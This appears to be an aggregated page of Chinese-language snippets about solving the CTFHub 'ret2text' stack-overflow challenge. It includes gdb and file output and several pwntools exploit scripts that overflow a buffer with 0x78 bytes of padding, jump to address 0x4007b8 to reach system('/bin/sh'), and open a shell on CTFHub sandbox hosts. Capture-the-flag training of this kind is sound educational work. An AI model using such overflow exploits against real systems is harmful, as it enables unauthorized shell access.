利用gdb反编译查看一下system函数的地址,从lea指令传递函数参数开始算起,即返回地址rip应指向地址0x4007b8 disassemble命令:反汇编某段代码,查看某段代码的汇编指令 三、EXP from pwn import * #调用pwntools库 p=remote('challenge-19ff1036d92721f4.sandbox.ctfhub.com',27123) sys_add=0x4007b8 payload=b'a'*...
或者远程(ctfhub上开启题目会给出一个网址和端口)# process打开本地进程,remote 连接远程 io = process('./ret2text') # io = remote('challenge-65d082a535b3c937.sandbox.ctfhub.com',22748)# 发送payloadio.sendline(payload)# 开启交互io.interactive()...
在CTF比赛中,ret2text题目通常要求参赛者分析一个存在栈溢出漏洞的二进制程序,找到system("/bin/sh")调用或其他可利用的代码段,并构造合适的payload来触发漏洞,获得系统的控制权。参赛者需要掌握IDA Pro、GDB等逆向工程工具的使用,以及pwntools等CTF解题工具库。 3. CTFHub上ret2text题目的解题思路和教程 CTFHub上的...
giantbranch@ubuntu:~/Desktop$ file ./pwn ./pwn: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l,forGNU/Linux 3.2.0, BuildID[sha1]=9dc32140f0e317f9e6a59b9a226a5123e34ace21, not stripped 确认是一个64位的elf文件。 1 2 3 4 5 6 7 ...
from pwn import * host='challenge-1868f48f1e630fd3.sandbox.ctfhub.com' port=27988 p=connect(host,port) payload = b'A' * 0x78 +p64(0x4007b8) p.sendline(payload) p.interactive() 效果: __EOF__ 本文作者: 柠檬i 本文链接: https://www.cnblogs.com/CVE-Lemon/p/16188003.html 关...